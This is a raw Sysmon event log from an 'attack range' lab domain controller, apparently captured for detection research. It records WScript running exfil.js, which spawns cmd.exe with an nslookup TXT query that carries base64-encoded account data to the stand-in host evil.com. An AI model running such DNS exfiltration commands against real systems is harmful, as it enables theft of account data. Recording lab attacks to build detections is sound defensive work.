14:21:35.443{2E1864BB-18E0-629A-6742-000000005F02}3976ATTACKRANGE\AdministratorC:\Windows\System32\WScript.exeC:\Users\ADMINI~1\AppData\Local\Temp\2\nlfcgw.tmpMD5=A34E51212F39558EBE732D21D99FEDF2,SHA256=5DE051C45C6FF241BEB3458EC270E41740C34AAC9505902985C1C0DEA13E8B9D,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000210326Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:35.412{2E1864BB-18EF-629A-3044-000000005F02}39925624C:\Windows\system32\conhost.exe{2E1864BB-18EF-629A-3144-000000005F02}6508C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000210325Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:35.412{2E1864BB-FA28-6299-3207-000000005F02}50324716C:\Windows\system32\csrss.exe{2E1864BB-18EF-629A-3144-000000005F02}6508C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000210324Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:35.412{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000210323Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:35.412{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000210322Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:35.412{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000210321Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:35.412{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000210320Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:35.412{2E1864BB-18EF-629A-2F44-000000005F02}76727532C:\Windows\system32\cmd.exe{2E1864BB-18EF-629A-3144-000000005F02}6508C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000210319Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:35.421{2E1864BB-18EF-629A-3144-000000005F02}6508C:\Windows\System32\nslookup.exe10.0.14393.0 (rs1_release.160715-1616)nslookupMicrosoft® Windows® Operating SystemMicrosoft Corporationnslookup.exenslookup.exe -timeout=5 -retry=3 -type=TXT KioqV2luMzJfVXNlckFjY291bnQqKio= evil.com C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=488698C899FE524430270C1D14FE99CF,SHA256=24553BFAB13871FAF3EE6F1F8EFECC5D25368A706A42CA35319228D3547418FA,IMPHASH=446F3F94B921C80C9E9497075AA3EF61{2E1864BB-18EF-629A-2F44-000000005F02}7672C:\Windows\System32\cmd.exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=TXT KioqV2luMzJfVXNlckFjY291bnQqKio= evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlfcgw.tmp 2>&1 10341000x8000000000000000210318Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:35.381{2E1864BB-E13E-6299-1000-000000005F02}3641888C:\Windows\system32\svchost.exe{2E1864BB-18EF-629A-3044-000000005F02}3992C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000210317Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:35.381{2E1864BB-E13E-6299-1000-000000005F02}3641376C:\Windows\system32\svchost.exe{2E1864BB-18EF-629A-3044-000000005F02}3992C:\Windows\system32\conhost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 354300x8000000000000000210316Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:33.788{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-50793- 354300x8000000000000000210315Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:33.788{00000000-0000-0000-0000-000000000000}2872<unknown process>-udptruefalse127.0.0.1-50793-false127.0.0.1-53domain 354300x8000000000000000210314Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:33.788{00000000-0000-0000-0000-000000000000}2872<unknown process>-udpfalsefalse127.0.0.1-50792-false127.0.0.1-53domain 354300x8000000000000000210313Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:33.788{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-50792- 354300x8000000000000000210312Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:33.788{00000000-0000-0000-0000-000000000000}2872<unknown process>-udptruefalse127.0.0.1-50792-false127.0.0.1-53domain 354300x8000000000000000210311Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:33.788{00000000-0000-0000-0000-000000000000}2872<unknown process>-udpfalsefalse127.0.0.1-50791-false127.0.0.1-53domain 354300x8000000000000000210310Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:33.788{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-50791- 354300x8000000000000000210309Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:33.787{00000000-0000-0000-0000-000000000000}2872<unknown process>-udptruefalse127.0.0.1-50791-false127.0.0.1-53domain 354300x8000000000000000210308Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:33.717{00000000-0000-0000-0000-000000000000}7716<unknown process>-udpfalsefalse127.0.0.1-50790-false127.0.0.1-53domain 354300x8000000000000000210307Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:33.717{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-50790- 354300x8000000000000000210306Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:33.717{00000000-0000-0000-0000-000000000000}7716<unknown process>-udpfalsefalse127.0.0.1-50789-false127.0.0.1-53domain 354300x8000000000000000210305Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:33.717{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-50789- 354300x8000000000000000210304Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:33.717{00000000-0000-0000-0000-000000000000}7716<unknown process>-udptruefalse127.0.0.1-50789-false127.0.0.1-53domain 354300x8000000000000000210303Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:33.717{00000000-0000-0000-0000-000000000000}7716<unknown process>-udpfalsefalse127.0.0.1-50788-false127.0.0.1-53domain 354300x8000000000000000210302Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:33.717{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-50788- 354300x8000000000000000210301Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:33.717{00000000-0000-0000-0000-000000000000}7716<unknown process>-udptruefalse127.0.0.1-50788-false127.0.0.1-53domain 10341000x8000000000000000210300Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:35.378{2E1864BB-18EF-629A-3044-000000005F02}39925624C:\Windows\system32\conhost.exe{2E1864BB-18EF-629A-2F44-000000005F02}7672C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000210299Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:35.359{2E1864BB-FA28-6299-3207-000000005F02}50324716C:\Windows\system32\csrss.exe{2E1864BB-18EF-629A-3044-000000005F02}3992C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000210298Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:35.344{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000210297Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:35.344{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000210296Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:35.344{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000210295Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:35.344{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000210294Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:35.344{2E1864BB-FA28-6299-3207-000000005F02}50322100C:\Windows\system32\csrss.exe{2E1864BB-18EF-629A-2F44-000000005F02}7672C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000210293Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:35.344{2E1864BB-18E0-629A-6742-000000005F02}39762036C:\Windows\System32\WScript.exe{2E1864BB-18EF-629A-2F44-000000005F02}7672C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\windows.storage.dll+16e79b|C:\Windows\System32\windows.storage.dll+16e4b1|C:\Windows\System32\windows.storage.dll+16e0fe|C:\Windows\System32\windows.storage.dll+16f3a0|C:\Windows\System32\windows.storage.dll+16de4e|C:\Windows\System32\windows.storage.dll+fce4d|C:\Windows\System32\windows.storage.dll+fd58c|C:\Windows\System32\windows.storage.dll+fc8f0|C:\Windows\System32\SHELL32.dll+49d0f|C:\Windows\System32\SHELL32.dll+49b9c|C:\Windows\System32\SHELL32.dll+b2f5e|C:\Windows\System32\shcore.dll+33fbd|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000210292Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:35.358{2E1864BB-18EF-629A-2F44-000000005F02}7672C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=TXT KioqV2luMzJfVXNlckFjY291bnQqKio= evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlfcgw.tmp 2>&1C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{2E1864BB-18E0-629A-6742-000000005F02}3976C:\Windows\System32\wscript.exe"C:\Windows\System32\WScript.exe" "C:\Temp\exfil.js" 23542300x8000000000000000210291Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:35.344{2E1864BB-18E0-629A-6742-000000005F02}3976ATTACKRANGE\AdministratorC:\Windows\System32\WScript.exeC:\Users\ADMINI~1\AppData\Local\Temp\2\nligdn.tmpMD5=05BA971AFDC62533F0A9B0611710936B,SHA256=CC7F6EF6FDFF1D48F32CBB164D99D5681824740D7C263CA1F614A2D5F388A371,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000210290Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:35.328{2E1864BB-18EF-629A-2D44-000000005F02}13845628C:\Windows\system32\conhost.exe{2E1864BB-18EF-629A-2E44-000000005F02}5404C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000210289Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:35.328{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000210288Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:35.328{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000210287Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:35.328{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000210286Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:35.328{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000210285Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:35.328{2E1864BB-FA28-6299-3207-000000005F02}50324048C:\Windows\system32\csrss.exe{2E1864BB-18EF-629A-2E44-000000005F02}5404C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000210284Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 